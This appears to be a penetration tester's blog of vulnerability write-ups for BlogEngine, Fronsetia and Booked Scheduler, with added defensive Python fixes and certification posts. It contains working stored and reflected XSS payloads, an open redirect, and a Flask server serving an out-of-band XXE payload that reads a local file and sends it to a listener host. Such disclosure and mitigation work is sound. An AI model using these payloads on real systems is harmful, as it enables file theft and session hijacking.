Saturday, 14 December 2024

Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8


Description

- It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place.


Stored XSS Filter Bypass #1 - "Add Category"

Steps to Reproduce:
  1. Login as admin and go to "Content" > "Posts"
  2. On the right side of the page choose "Categories"
  3. In "Title" and "Description" paste the following payload <b>12345</b><script>alert(1)</script><b>12345=</b>

// HTTP PUT request

PUT /blogengine/api/posts/update/foo HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]

[...]
","DateCreated":"2024-12-14 14:33","Slug":"xss","RelativeLink":"/blogengine/post/2024/12/14/xss","Categories":[{"IsChecked":false,"Id":"40a7136b-2f0d-491a-8690-2a092681ed3b","Title":"<b>12345</b><script>alert(1)</script><b>12345=</b>"}],"Tags":[],"Comments":null,"HasCommentsEnabled":true,"IsPublished":false,"IsDeleted":false,"CanUserDelete":true,"CanUserEdit":true}
[...]


// HTTP response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:34:08 GMT
Content-Length: 0


// HTTP GET request

GET /blogengine/post/2024/12/14/xss HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]


// HTTP response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
x-pingback: http://192.168.58.153:8080/blogengine/pingback.axd
Content-Style-Type: text/css
Content-Script-Type: text/javascript
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:44:05 GMT
Content-Length: 19229

[...]
<span class="post-category"><a href="/blogengine/category/&lt;b&gt;12345&lt;b&gt;&lt;script&gt;alert(1)&lt;script&gt;&lt;b&gt;12345=&lt;b&gt;"><b>12345</b><script>alert(1)</script><b>12345=</b></a></span></div></header>
[...]

Thursday, 21 November 2024

Friday Fun Pentest Series - 15 - OOB XXE - fronsetiav1.1

Description

- The application is vulnerable to OOB XXE injection


XXE #1 - "show_operations.jsp"

Steps to Reproduce:

  1. Add Python3 server to serve malicious XXE payload
  2. Create a file on the file system for the XXE payload to read: echo 123123 > /tmp
  3. Enter the following URL as input
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl

// Python Server Code

from flask import Flask, Response
import logging

app = Flask(__name__)

# Set up logging
logging.basicConfig(level=logging.DEBUG)

# Stage 1: returned to the application in place of a WSDL; its DOCTYPE
# references the external parameter entity served by /data.dtd below
@app.route('/testxxeService')
def catch_all():
    app.logger.debug("Serving XXE payload")
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)

# Stage 2: the external DTD, which reads /tmp/123 and makes the parser
# send it back as a query string to the listener on port 8000
@app.route('/data.dtd')
def hello():
    app.logger.debug("DTD requested")
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % eval "<!ENTITY &#37; exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">
%eval;
%exfil;"""
    return Response(xml, mimetype='text/xml', status=200)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)
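On the receiving side the fix is to refuse DTDs before the parser can act on them, since a WSDL has no legitimate reason to carry a DOCTYPE. The following is an added Python example and not fronsetia's code (the application is Java): it pre-scans with expat so any DOCTYPE aborts the parse before an entity can be fetched, and it is run against the stage-one document the Flask server above returns, with a constructed DTD-free WSDL as the control.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DtdForbidden(ValueError):
    """Raised on any DOCTYPE; a WSDL never needs one."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat fires this the moment <!DOCTYPE ...> is read, before any entity
    # declared in it can be expanded or fetched over the network.
    raise DtdForbidden(
        f"DOCTYPE {name!r} refused (system id={system_id!r}, "
        f"internal subset={bool(has_internal_subset)})"
    )


def parse_wsdl_safely(data: bytes) -> ET.Element:
    """Pre-scan with expat so a DOCTYPE aborts parsing, then build the tree."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(data, True)   # raises DtdForbidden or ExpatError
    return ET.fromstring(data)  # reached only for DTD-free documents


def classify(data: bytes) -> str:
    """'rejected: ...', 'malformed: ...' or 'ok: <root tag>' for a fetched WSDL."""
    try:
        root = parse_wsdl_safely(data)
    except DtdForbidden as exc:
        return f"rejected: {exc}"
    except (ET.ParseError, expat.ExpatError) as exc:
        return f"malformed: {exc}"
    return f"ok: {root.tag}"


# Stage-one document the Flask server in the write-up returns as the "WSDL".
XXE_STAGE1 = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""

# Constructed minimal WSDL with no DOCTYPE: the guard must let this through.
BENIGN_WSDL = b"""<?xml version="1.0" encoding="UTF-8"?>
<definitions name="Echo" xmlns="http://schemas.xmlsoap.org/wsdl/">
  <portType name="EchoPort"><operation name="echo"/></portType>
</definitions>"""
```

The same pre-scan works for SOAP request bodies, which are equally DTD-free in practice.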

Wednesday, 20 November 2024

Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1

Description

- It was found that the application was vulnerable to Reflected XSS


Reflected XSS #1 - "show_operations.jsp"

Steps to Reproduce:

  1. Visit main page of the application.
  2. In the input field of "WSDL Location" enter the following payload "><img src=x onerror=alert(1)>

// HTTP GET Request

GET /fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1
Host: 192.168.78.128:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
[...]


// HTTP Response

HTTP/1.1 200 
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6360
Date: Wed, 20 Nov 2024 19:42:15 GMT
Keep-Alive: timeout=20
Connection: keep-alive

[...]
<title> Fronsetia: "><img src=x onerror=alert(1)> </title>
[...]

Thursday, 7 November 2024

It's Official - BSCP Certified

It's official. I'm BSCP (Burp Suite Certified Practitioner) certified. Took me a few tries to pass :)

Key takeaways from the attempts:

  • Don't give up
  • It's a difficult exam
  • Check all the relevant labs in the PortSwigger Academy
  • Check for bypasses in the Academy labs
  • Make sure to have a good list of notes such as payloads and bypasses ready

That's it folks!

Saturday, 19 October 2024

Friday Fun Pentest Series - 13 - Reflected XSS - booked scheduler v2.8.5

Description

- It was found that the application suffered from Reflected XSS on several pages


Reflected XSS #1 - "reservation.php"

// HTTP GET request

GET /Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; new_version=v%3D2.8.5%2Cfs%3D1728734988; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return to the last page that you were on</a></h5>
</div>

Reflected XSS #2 - "schedule.php"

// HTTP GET request

GET /Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb; resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D; schedule_calendar_toggle=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return to the last page that you were on
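The BlogEngine category title at the top of this page and the Booked "rid" parameter here fail the same way: the value is dropped into HTML without encoding for the slot it lands in (BlogEngine even encodes the href but not the link text). The following is an added Python example, not code from either project: it reconstructs the two renderings visible in the captured responses, shows the corrected output encoding, and uses HTMLParser as a regression check that flags any tag the template did not put there.

```python
import html
from html.parser import HTMLParser

# Payloads exactly as they appear in the two write-ups (test data, not live input).
BLOGENGINE_TITLE = '<b>12345</b><script>alert(1)</script><b>12345=</b>'
BOOKED_RID = '"><script>alert(document.domain)</script>'


def render_as_observed(kind: str, value: str) -> str:
    """Reconstruction of what the captured responses show; not the apps' own code."""
    if kind == "category":  # BlogEngine: href encoded, link text inserted raw
        return f'<a href="/blogengine/category/{html.escape(value)}">{value}</a>'
    if kind == "href":      # Booked: value inserted raw inside a quoted href
        return f'<a href="//localhost/Web/reservation.php?rid={value}">Return</a>'
    raise ValueError(kind)


def render_fixed(kind: str, value: str) -> str:
    """Same markup, with the value entity-encoded for every slot it lands in."""
    enc = html.escape(value, quote=True)  # &, <, >, ", ' become entities
    if kind == "category":
        return f'<a href="/blogengine/category/{enc}">{enc}</a>'
    if kind == "href":
        return f'<a href="//localhost/Web/reservation.php?rid={enc}">Return</a>'
    raise ValueError(kind)


class _TagCollector(HTMLParser):
    """Records every start tag the browser-side tokenizer would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def foreign_tags(fragment: str, allowed: set[str]) -> list[str]:
    """Tags in `fragment` that the template did not put there (regression check)."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return [t for t in collector.tags if t not in allowed]


if __name__ == "__main__":
    for kind, value in (("category", BLOGENGINE_TITLE), ("href", BOOKED_RID)):
        print(kind, "observed:", foreign_tags(render_as_observed(kind, value), {"a"}))
        print(kind, "fixed:   ", foreign_tags(render_fixed(kind, value), {"a"}))
```

Input filtering such as the one BlogEngine applied to the title is at best a second layer; encoding at output is what makes the stored value inert wherever it is later rendered.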




Friday Fun Pentest Series - 12 - Open Redirect - booked scheduler v2.8.5

Description

- It was found that the application suffered from Open Redirect on the login page via the "resume" parameter


Open Redirect

Steps to Reproduce:

  1. Login and intercept the HTTP request with a proxy such as Burp Suite or ZAP
  2. In the "resume" parameter add the redirect URL, e.g. a Burp Collaborator URL
  3. Forward the request


// HTTP POST login request

POST /Bookedbo8effotfu/Web/index.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]

email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg


// HTTP response

HTTP/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
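The fix for the "resume" parameter is to accept only a path on the same site before it is copied into the Location header. The following is an added Python example and not Booked's PHP code; the fallback landing path is constructed, and the rejected inputs include the Collaborator URL from the request above.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed fallback used whenever "resume" is not a local path.
DEFAULT_LANDING = "/Bookedbo8effotfu/Web/dashboard.php"


def safe_resume(value, default: str = DEFAULT_LANDING) -> str:
    """Return `value` only if it is a path on this site, otherwise `default`.

    Keeps '/Bookedbo8effotfu/Web/schedule.php?sid=1'; refuses absolute URLs,
    scheme-relative '//host', backslash and whitespace variants of them, and
    anything a browser could read as a scheme such as 'javascript:'.
    """
    if not value:
        return default
    # Browsers drop tabs/newlines and treat '\' as '/', so normalise first
    # and judge the string the browser would actually navigate to.
    candidate = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    candidate = candidate.replace("\\", "/")
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return default
    # Rebuild from path and query only; a fragment has no business in a
    # Location header and is never seen by the server anyway.
    return urlunsplit(("", "", parts.path, parts.query, ""))
```

Where a login must return users to a page, an alternative is to store the intended path server-side in the session and never round-trip it through the client at all.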

Saturday, 5 October 2024

New Certification Study - SANS 522

Happy to announce that I have enrolled on the SANS 522 course for Web Security. I will keep updating my blog on what has been learned so far.


Introduction

  • Instructor is Jason Lam
  • The course comes with six books in PDF and hardcopy format
  • I opted in for purchasing the exam voucher and two practice tests
  • The course gives a VM so you can practice
  • It also has on-demand videos for each module and topic


Book 1:

  • Focuses on misconfigurations
  • Architecture security
  • Basics of how the web works
  • SSRF
  • HTTP methods

Book 2:

  • Input validation
  • Injection attacks and their mitigations
  • CSRF and other attacks including defences
  • File uploads functionality
  • Unicode attacks

Book 3:

  • Authentication security
  • Authorization security
  • SAML/OAuth security

Book 4:

  • Frontend security
  • AJAX security
  • Webservices
  • NodeJS security
  • Clickjacking
  • Browser security

Book 5:

  • API security
  • GraphQL security
  • Deserialization

The link for the course is here:

https://www.sans.org/cyber-security-courses/application-security-securing-web-apps-api-microservices/